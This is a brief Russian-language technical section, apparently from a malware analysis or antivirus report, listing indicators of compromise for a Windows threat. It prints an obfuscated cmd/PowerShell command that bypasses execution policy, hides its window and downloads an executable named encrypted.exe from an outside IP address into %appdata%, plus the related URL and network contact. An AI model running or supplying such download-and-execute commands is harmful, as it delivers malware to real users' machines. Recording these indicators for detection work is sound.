Техническая информация
- http://81.4.122.120/encrypted.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWERsHeL^l.^eXe^ ^-^EXe^cUTIonPO^L^ic^y B^yP^AsS ^-^n^OPROFIL^e -windo^WstY^LE^ h^iD^DEN ^(NEw-ObjEc^t^ ^SYste^m^.NeT^.we^B^CL^ie^n^T)^.DoW^nLoaD^FI^L^e^(^'http://81.4....
- '81.#.122.120':80
- http://81.#.122.120/encrypted.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWERsHeL^l.^eXe^ ^-^EXe^cUTIonPO^L^ic^y B^yP^AsS ^-^n^OPROFIL^e -windo^WstY^LE^ h^iD^DEN ^(NEw-ObjEc^t^ ^SYste^m^.NeT^.we^B^CL^ie^n^T)^.DoW^nLoaD^FI^L^e^(^'http://81.4....' (со скрытым окном)